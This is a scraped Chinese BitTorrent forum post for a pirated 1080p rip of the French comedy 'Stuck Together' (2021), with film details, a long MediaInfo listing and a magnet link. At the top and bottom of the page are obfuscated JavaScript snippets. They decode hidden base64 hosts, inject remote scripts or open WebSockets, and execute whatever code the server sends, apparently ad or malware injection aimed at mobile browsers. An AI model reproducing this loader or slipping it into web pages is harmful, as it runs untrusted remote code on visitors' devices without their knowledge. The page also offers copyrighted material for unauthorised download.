粘在一起的隔离[中文字幕].Stuck.Together.2021.1080p.NF.WEB-DL.DDP5.1.x264 9.02GB

版主小s 1月前 315

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 粘在一起的隔离 / 粘在一起 / 好邻不串门 / Stuck Together

◎片 名 8 Rue de l'Humanité

◎年 代 2021

◎产 地 法国

◎类 别 喜剧

◎语 言 法语

◎上映日期 2021-10-20(法国)

◎IMDb链接 https://www.imdb.com/title/tt13834006/

◎豆瓣链接 https://movie.douban.com/subject/35390972/

◎片 长 125分钟

◎导 演 丹尼·伯恩 Dany Boon (id:1009442)

◎编 剧 丹尼·伯恩 Dany Boon (id:1009442)

洛朗斯·阿尔内 Laurence Arné (id:1341875)

◎演 员 丹尼·伯恩 Dany Boon (id:1009442)

洛朗斯·阿尔内 Laurence Arné (id:1341875)

弗朗索瓦·达密安 Fran?ois Damiens (id:1338355)

伊万·阿达勒 Yvan Attal (id:1014087)

艾莉森·惠勒 Alison Wheeler (id:1422957)

汤姆·里布 Tom Leeb (id:1421154)

莉莲娜·罗维埃 Liliane Rovère (id:1415017)

娜威尔·玛达尼 Nawell Madani (id:1387669)

艾丽·赛门 Elie Semoun (id:1028570)

◎标 签 法国 / 新冠 / 家庭 / 喜剧 / 2021 / 居家隔离 / YvanAttal / WK

◎简 介

当巴黎在疫情期间进入封锁状态时,公寓楼里各式各样的居民必须适应一种新生活。该片由丹尼·伯恩自导自演,弗朗索瓦·达密安 、劳伊万·阿达勒共同出演了这部温馨又充满趣味的隔离生活影片。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 125607003958358234971659096170545835538 (0x5E7F076D83D9562FBA0830431AC06E12)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.02 GiB

  8. Duration : 2 h 6 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 10.2 Mb/s

  11. Encoded date : UTC 2021-10-20 12:50:08

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 2 h 6 min

  24. Bit rate mode : Variable

  25. Bit rate : 2 517 kb/s

  26. Nominal bit rate : 2 740 kb/s

  27. Maximum bit rate : 4 110 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 24.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.051

  38. Stream size : 2.22 GiB (25%)

  39. Writing library : x264 core 148 r2724 dbe0335

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=2740 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4110 / vbv_bufsize=5480 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 2 h 6 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 579 MiB (6%)

  58. Title : French

  59. Language : French

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 2 h 6 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 579 MiB (6%)

  78. Title : English

  79. Language : English

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Audio #3

  84. ID : 4

  85. Format : E-AC-3

  86. Format/Info : Enhanced AC-3

  87. Commercial name : Dolby Digital Plus

  88. Codec ID : A_EAC3

  89. Duration : 2 h 6 min

  90. Bit rate mode : Constant

  91. Bit rate : 640 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 48.0 kHz

  95. Frame rate : 31.250 FPS (1536 SPF)

  96. Compression mode : Lossy

  97. Stream size : 579 MiB (6%)

  98. Title : Czech

  99. Language : Czech

  100. Service kind : Complete Main

  101. Default : No

  102. Forced : No


  103. Audio #4

  104. ID : 5

  105. Format : E-AC-3

  106. Format/Info : Enhanced AC-3

  107. Commercial name : Dolby Digital Plus

  108. Codec ID : A_EAC3

  109. Duration : 2 h 6 min

  110. Bit rate mode : Constant

  111. Bit rate : 640 kb/s

  112. Channel(s) : 6 channels

  113. Channel layout : L R C LFE Ls Rs

  114. Sampling rate : 48.0 kHz

  115. Frame rate : 31.250 FPS (1536 SPF)

  116. Compression mode : Lossy

  117. Stream size : 579 MiB (6%)

  118. Title : German

  119. Language : German

  120. Service kind : Complete Main

  121. Default : No

  122. Forced : No


  123. Audio #5

  124. ID : 6

  125. Format : E-AC-3

  126. Format/Info : Enhanced AC-3

  127. Commercial name : Dolby Digital Plus

  128. Codec ID : A_EAC3

  129. Duration : 2 h 6 min

  130. Bit rate mode : Constant

  131. Bit rate : 640 kb/s

  132. Channel(s) : 6 channels

  133. Channel layout : L R C LFE Ls Rs

  134. Sampling rate : 48.0 kHz

  135. Frame rate : 31.250 FPS (1536 SPF)

  136. Compression mode : Lossy

  137. Stream size : 579 MiB (6%)

  138. Title : Hungarian

  139. Language : Hungarian

  140. Service kind : Complete Main

  141. Default : No

  142. Forced : No


  143. Audio #6

  144. ID : 7

  145. Format : E-AC-3

  146. Format/Info : Enhanced AC-3

  147. Commercial name : Dolby Digital Plus

  148. Codec ID : A_EAC3

  149. Duration : 2 h 6 min

  150. Bit rate mode : Constant

  151. Bit rate : 640 kb/s

  152. Channel(s) : 6 channels

  153. Channel layout : L R C LFE Ls Rs

  154. Sampling rate : 48.0 kHz

  155. Frame rate : 31.250 FPS (1536 SPF)

  156. Compression mode : Lossy

  157. Stream size : 579 MiB (6%)

  158. Title : Italian

  159. Language : Italian

  160. Service kind : Complete Main

  161. Default : No

  162. Forced : No


  163. Audio #7

  164. ID : 8

  165. Format : E-AC-3

  166. Format/Info : Enhanced AC-3

  167. Commercial name : Dolby Digital Plus

  168. Codec ID : A_EAC3

  169. Duration : 2 h 6 min

  170. Bit rate mode : Constant

  171. Bit rate : 640 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 579 MiB (6%)

  178. Title : Polish

  179. Language : Polish

  180. Service kind : Complete Main

  181. Default : No

  182. Forced : No


  183. Audio #8

  184. ID : 9

  185. Format : E-AC-3

  186. Format/Info : Enhanced AC-3

  187. Commercial name : Dolby Digital Plus

  188. Codec ID : A_EAC3

  189. Duration : 2 h 6 min

  190. Bit rate mode : Constant

  191. Bit rate : 640 kb/s

  192. Channel(s) : 6 channels

  193. Channel layout : L R C LFE Ls Rs

  194. Sampling rate : 48.0 kHz

  195. Frame rate : 31.250 FPS (1536 SPF)

  196. Compression mode : Lossy

  197. Stream size : 579 MiB (6%)

  198. Title : Brazilian Portuguese

  199. Language : Portuguese

  200. Service kind : Complete Main

  201. Default : No

  202. Forced : No


  203. Audio #9

  204. ID : 10

  205. Format : E-AC-3

  206. Format/Info : Enhanced AC-3

  207. Commercial name : Dolby Digital Plus

  208. Codec ID : A_EAC3

  209. Duration : 2 h 6 min

  210. Bit rate mode : Constant

  211. Bit rate : 640 kb/s

  212. Channel(s) : 6 channels

  213. Channel layout : L R C LFE Ls Rs

  214. Sampling rate : 48.0 kHz

  215. Frame rate : 31.250 FPS (1536 SPF)

  216. Compression mode : Lossy

  217. Stream size : 579 MiB (6%)

  218. Title : Russian

  219. Language : Russian

  220. Service kind : Complete Main

  221. Default : No

  222. Forced : No


  223. Audio #10

  224. ID : 11

  225. Format : E-AC-3

  226. Format/Info : Enhanced AC-3

  227. Commercial name : Dolby Digital Plus

  228. Codec ID : A_EAC3

  229. Duration : 2 h 6 min

  230. Bit rate mode : Constant

  231. Bit rate : 640 kb/s

  232. Channel(s) : 6 channels

  233. Channel layout : L R C LFE Ls Rs

  234. Sampling rate : 48.0 kHz

  235. Frame rate : 31.250 FPS (1536 SPF)

  236. Compression mode : Lossy

  237. Stream size : 579 MiB (6%)

  238. Title : Spanish

  239. Language : Spanish

  240. Service kind : Complete Main

  241. Default : No

  242. Forced : No


  243. Audio #11

  244. ID : 12

  245. Format : E-AC-3

  246. Format/Info : Enhanced AC-3

  247. Commercial name : Dolby Digital Plus

  248. Codec ID : A_EAC3

  249. Duration : 2 h 6 min

  250. Bit rate mode : Constant

  251. Bit rate : 640 kb/s

  252. Channel(s) : 6 channels

  253. Channel layout : L R C LFE Ls Rs

  254. Sampling rate : 48.0 kHz

  255. Frame rate : 31.250 FPS (1536 SPF)

  256. Compression mode : Lossy

  257. Stream size : 579 MiB (6%)

  258. Title : European Spanish

  259. Language : Spanish

  260. Service kind : Complete Main

  261. Default : No

  262. Forced : No


  263. Audio #12

  264. ID : 13

  265. Format : E-AC-3

  266. Format/Info : Enhanced AC-3

  267. Commercial name : Dolby Digital Plus

  268. Codec ID : A_EAC3

  269. Duration : 2 h 6 min

  270. Bit rate mode : Constant

  271. Bit rate : 640 kb/s

  272. Channel(s) : 6 channels

  273. Channel layout : L R C LFE Ls Rs

  274. Sampling rate : 48.0 kHz

  275. Frame rate : 31.250 FPS (1536 SPF)

  276. Compression mode : Lossy

  277. Stream size : 579 MiB (6%)

  278. Title : Turkish

  279. Language : Turkish

  280. Service kind : Complete Main

  281. Default : No

  282. Forced : No


  283. Text #1

  284. ID : 14

  285. Format : UTF-8

  286. Codec ID : S_TEXT/UTF8

  287. Codec ID/Info : UTF-8 Plain Text

  288. Duration : 1 h 58 min

  289. Bit rate : 67 b/s

  290. Count of elements : 2032

  291. Stream size : 58.1 KiB (0%)

  292. Title : English

  293. Language : English

  294. Default : Yes

  295. Forced : No


  296. Text #2

  297. ID : 15

  298. Format : UTF-8

  299. Codec ID : S_TEXT/UTF8

  300. Codec ID/Info : UTF-8 Plain Text

  301. Duration : 2 h 5 min

  302. Bit rate : 100 b/s

  303. Count of elements : 2034

  304. Stream size : 92.1 KiB (0%)

  305. Title : Arabic

  306. Language : Arabic

  307. Default : No

  308. Forced : No


  309. Text #3

  310. ID : 16

  311. Format : UTF-8

  312. Codec ID : S_TEXT/UTF8

  313. Codec ID/Info : UTF-8 Plain Text

  314. Duration : 2 h 5 min

  315. Bit rate : 65 b/s

  316. Count of elements : 2034

  317. Stream size : 59.7 KiB (0%)

  318. Title : Chinese Simplified

  319. Language : Chinese

  320. Default : No

  321. Forced : No


  322. Text #4

  323. ID : 17

  324. Format : UTF-8

  325. Codec ID : S_TEXT/UTF8

  326. Codec ID/Info : UTF-8 Plain Text

  327. Duration : 2 h 5 min

  328. Bit rate : 62 b/s

  329. Count of elements : 2034

  330. Stream size : 57.3 KiB (0%)

  331. Title : Chinese Traditional

  332. Language : Chinese

  333. Default : No

  334. Forced : No


  335. Text #5

  336. ID : 18

  337. Format : UTF-8

  338. Codec ID : S_TEXT/UTF8

  339. Codec ID/Info : UTF-8 Plain Text

  340. Duration : 2 h 5 min

  341. Bit rate : 56 b/s

  342. Count of elements : 2033

  343. Stream size : 51.8 KiB (0%)

  344. Title : Croatian

  345. Language : Croatian

  346. Default : No

  347. Forced : No


  348. Text #6

  349. ID : 19

  350. Format : UTF-8

  351. Codec ID : S_TEXT/UTF8

  352. Codec ID/Info : UTF-8 Plain Text

  353. Duration : 2 h 5 min

  354. Bit rate : 59 b/s

  355. Count of elements : 2034

  356. Stream size : 54.7 KiB (0%)

  357. Title : Czech

  358. Language : Czech

  359. Default : No

  360. Forced : No


  361. Text #7

  362. ID : 20

  363. Format : UTF-8

  364. Codec ID : S_TEXT/UTF8

  365. Codec ID/Info : UTF-8 Plain Text

  366. Duration : 2 h 5 min

  367. Bit rate : 60 b/s

  368. Count of elements : 2032

  369. Stream size : 55.3 KiB (0%)

  370. Title : Danish

  371. Language : Danish

  372. Default : No

  373. Forced : No


  374. Text #8

  375. ID : 21

  376. Format : UTF-8

  377. Codec ID : S_TEXT/UTF8

  378. Codec ID/Info : UTF-8 Plain Text

  379. Duration : 2 h 5 min

  380. Bit rate : 57 b/s

  381. Count of elements : 1967

  382. Stream size : 52.4 KiB (0%)

  383. Title : Dutch

  384. Language : Dutch

  385. Default : No

  386. Forced : No


  387. Text #9

  388. ID : 22

  389. Format : UTF-8

  390. Codec ID : S_TEXT/UTF8

  391. Codec ID/Info : UTF-8 Plain Text

  392. Duration : 2 h 5 min

  393. Bit rate : 59 b/s

  394. Count of elements : 2034

  395. Stream size : 54.4 KiB (0%)

  396. Title : Finnish

  397. Language : Finnish

  398. Default : No

  399. Forced : No


  400. Text #10

  401. ID : 23

  402. Format : UTF-8

  403. Codec ID : S_TEXT/UTF8

  404. Codec ID/Info : UTF-8 Plain Text

  405. Duration : 1 h 59 min

  406. Bit rate : 122 b/s

  407. Count of elements : 2691

  408. Stream size : 107 KiB (0%)

  409. Title : French

  410. Language : French

  411. Default : No

  412. Forced : No


  413. Text #11

  414. ID : 24

  415. Format : UTF-8

  416. Codec ID : S_TEXT/UTF8

  417. Codec ID/Info : UTF-8 Plain Text

  418. Duration : 1 h 33 min

  419. Bit rate : 0 b/s

  420. Count of elements : 16

  421. Stream size : 401 Bytes (0%)

  422. Title : French (Forced)

  423. Language : French

  424. Default : No

  425. Forced : Yes


  426. Text #12

  427. ID : 25

  428. Format : UTF-8

  429. Codec ID : S_TEXT/UTF8

  430. Codec ID/Info : UTF-8 Plain Text

  431. Duration : 2 h 5 min

  432. Bit rate : 63 b/s

  433. Count of elements : 2033

  434. Stream size : 58.4 KiB (0%)

  435. Title : German

  436. Language : German

  437. Default : No

  438. Forced : No


  439. Text #13

  440. ID : 26

  441. Format : UTF-8

  442. Codec ID : S_TEXT/UTF8

  443. Codec ID/Info : UTF-8 Plain Text

  444. Duration : 2 h 5 min

  445. Bit rate : 106 b/s

  446. Count of elements : 2033

  447. Stream size : 97.8 KiB (0%)

  448. Title : Greek

  449. Language : Greek

  450. Default : No

  451. Forced : No


  452. Text #14

  453. ID : 27

  454. Format : UTF-8

  455. Codec ID : S_TEXT/UTF8

  456. Codec ID/Info : UTF-8 Plain Text

  457. Duration : 2 h 5 min

  458. Bit rate : 91 b/s

  459. Count of elements : 2034

  460. Stream size : 84.0 KiB (0%)

  461. Title : Hebrew

  462. Language : Hebrew

  463. Default : No

  464. Forced : No


  465. Text #15

  466. ID : 28

  467. Format : UTF-8

  468. Codec ID : S_TEXT/UTF8

  469. Codec ID/Info : UTF-8 Plain Text

  470. Duration : 2 h 5 min

  471. Bit rate : 60 b/s

  472. Count of elements : 2028

  473. Stream size : 55.5 KiB (0%)

  474. Title : Hungarian

  475. Language : Hungarian

  476. Default : No

  477. Forced : No


  478. Text #16

  479. ID : 29

  480. Format : UTF-8

  481. Codec ID : S_TEXT/UTF8

  482. Codec ID/Info : UTF-8 Plain Text

  483. Duration : 2 h 5 min

  484. Bit rate : 57 b/s

  485. Count of elements : 2033

  486. Stream size : 52.7 KiB (0%)

  487. Title : Indonesian

  488. Language : Indonesian

  489. Default : No

  490. Forced : No


  491. Text #17

  492. ID : 30

  493. Format : UTF-8

  494. Codec ID : S_TEXT/UTF8

  495. Codec ID/Info : UTF-8 Plain Text

  496. Duration : 2 h 5 min

  497. Bit rate : 61 b/s

  498. Count of elements : 2031

  499. Stream size : 56.6 KiB (0%)

  500. Title : Italian

  501. Language : Italian

  502. Default : No

  503. Forced : No


  504. Text #18

  505. ID : 31

  506. Format : UTF-8

  507. Codec ID : S_TEXT/UTF8

  508. Codec ID/Info : UTF-8 Plain Text

  509. Duration : 2 h 5 min

  510. Bit rate : 62 b/s

  511. Count of elements : 2170

  512. Stream size : 57.5 KiB (0%)

  513. Title : Japanese

  514. Language : Japanese

  515. Default : No

  516. Forced : No


  517. Text #19

  518. ID : 32

  519. Format : UTF-8

  520. Codec ID : S_TEXT/UTF8

  521. Codec ID/Info : UTF-8 Plain Text

  522. Duration : 2 h 5 min

  523. Bit rate : 79 b/s

  524. Count of elements : 2032

  525. Stream size : 72.6 KiB (0%)

  526. Title : Korean

  527. Language : Korean

  528. Default : No

  529. Forced : No


  530. Text #20

  531. ID : 33

  532. Format : UTF-8

  533. Codec ID : S_TEXT/UTF8

  534. Codec ID/Info : UTF-8 Plain Text

  535. Duration : 2 h 5 min

  536. Bit rate : 62 b/s

  537. Count of elements : 2032

  538. Stream size : 56.8 KiB (0%)

  539. Title : Malay

  540. Language : Malay

  541. Default : No

  542. Forced : No


  543. Text #21

  544. ID : 34

  545. Format : UTF-8

  546. Codec ID : S_TEXT/UTF8

  547. Codec ID/Info : UTF-8 Plain Text

  548. Duration : 2 h 5 min

  549. Bit rate : 59 b/s

  550. Count of elements : 2034

  551. Stream size : 54.4 KiB (0%)

  552. Title : Norwegian Bokmal

  553. Language : Norwegian Bokmal

  554. Default : No

  555. Forced : No


  556. Text #22

  557. ID : 35

  558. Format : UTF-8

  559. Codec ID : S_TEXT/UTF8

  560. Codec ID/Info : UTF-8 Plain Text

  561. Duration : 2 h 5 min

  562. Bit rate : 58 b/s

  563. Count of elements : 2027

  564. Stream size : 53.5 KiB (0%)

  565. Title : Polish

  566. Language : Polish

  567. Default : No

  568. Forced : No


  569. Text #23

  570. ID : 36

  571. Format : UTF-8

  572. Codec ID : S_TEXT/UTF8

  573. Codec ID/Info : UTF-8 Plain Text

  574. Bit rate : 0 b/s

  575. Count of elements : 0

  576. Stream size : 0.00 Byte (0%)

  577. Title : Portuguese

  578. Language : Portuguese

  579. Default : No

  580. Forced : No


  581. Text #24

  582. ID : 37

  583. Format : UTF-8

  584. Codec ID : S_TEXT/UTF8

  585. Codec ID/Info : UTF-8 Plain Text

  586. Duration : 2 h 5 min

  587. Bit rate : 64 b/s

  588. Count of elements : 1976

  589. Stream size : 59.0 KiB (0%)

  590. Title : Brazilian Portuguese

  591. Language : Portuguese

  592. Default : No

  593. Forced : No


  594. Text #25

  595. ID : 38

  596. Format : UTF-8

  597. Codec ID : S_TEXT/UTF8

  598. Codec ID/Info : UTF-8 Plain Text

  599. Duration : 2 h 5 min

  600. Bit rate : 68 b/s

  601. Count of elements : 2033

  602. Stream size : 63.1 KiB (0%)

  603. Title : Romanian

  604. Language : Romanian

  605. Default : No

  606. Forced : No


  607. Text #26

  608. ID : 39

  609. Format : UTF-8

  610. Codec ID : S_TEXT/UTF8

  611. Codec ID/Info : UTF-8 Plain Text

  612. Duration : 2 h 5 min

  613. Bit rate : 104 b/s

  614. Count of elements : 2034

  615. Stream size : 96.1 KiB (0%)

  616. Title : Russian

  617. Language : Russian

  618. Default : No

  619. Forced : No


  620. Text #27

  621. ID : 40

  622. Format : UTF-8

  623. Codec ID : S_TEXT/UTF8

  624. Codec ID/Info : UTF-8 Plain Text

  625. Duration : 2 h 5 min

  626. Bit rate : 63 b/s

  627. Count of elements : 2062

  628. Stream size : 57.7 KiB (0%)

  629. Title : Spanish

  630. Language : Spanish

  631. Default : No

  632. Forced : No


  633. Text #28

  634. ID : 41

  635. Format : UTF-8

  636. Codec ID : S_TEXT/UTF8

  637. Codec ID/Info : UTF-8 Plain Text

  638. Duration : 2 h 5 min

  639. Bit rate : 63 b/s

  640. Count of elements : 2019

  641. Stream size : 58.0 KiB (0%)

  642. Title : European Spanish

  643. Language : Spanish

  644. Default : No

  645. Forced : No


  646. Text #29

  647. ID : 42

  648. Format : UTF-8

  649. Codec ID : S_TEXT/UTF8

  650. Codec ID/Info : UTF-8 Plain Text

  651. Duration : 2 h 5 min

  652. Bit rate : 62 b/s

  653. Count of elements : 2032

  654. Stream size : 57.1 KiB (0%)

  655. Title : Swedish

  656. Language : Swedish

  657. Default : No

  658. Forced : No


  659. Text #30

  660. ID : 43

  661. Format : UTF-8

  662. Codec ID : S_TEXT/UTF8

  663. Codec ID/Info : UTF-8 Plain Text

  664. Duration : 2 h 5 min

  665. Bit rate : 160 b/s

  666. Count of elements : 2037

  667. Stream size : 147 KiB (0%)

  668. Title : Thai

  669. Language : Thai

  670. Default : No

  671. Forced : No


  672. Text #31

  673. ID : 44

  674. Format : UTF-8

  675. Codec ID : S_TEXT/UTF8

  676. Codec ID/Info : UTF-8 Plain Text

  677. Duration : 2 h 5 min

  678. Bit rate : 63 b/s

  679. Count of elements : 2034

  680. Stream size : 57.7 KiB (0%)

  681. Title : Turkish

  682. Language : Turkish

  683. Default : No

  684. Forced : No


  685. Text #32

  686. ID : 45

  687. Format : UTF-8

  688. Codec ID : S_TEXT/UTF8

  689. Codec ID/Info : UTF-8 Plain Text

  690. Duration : 1 h 58 min

  691. Bit rate : 104 b/s

  692. Count of elements : 2033

  693. Stream size : 90.7 KiB (0%)

  694. Title : Ukrainian

  695. Language : Ukrainian

  696. Default : No

  697. Forced : No


  698. Text #33

  699. ID : 46

  700. Format : UTF-8

  701. Codec ID : S_TEXT/UTF8

  702. Codec ID/Info : UTF-8 Plain Text

  703. Duration : 2 h 5 min

  704. Bit rate : 86 b/s

  705. Count of elements : 2034

  706. Stream size : 79.5 KiB (0%)

  707. Title : Vietnamese

  708. Language : Vietnamese

  709. Default : No

  710. Forced : No




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:4E931EF6B3AEC68BA164813CC246924C816DFBF1

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};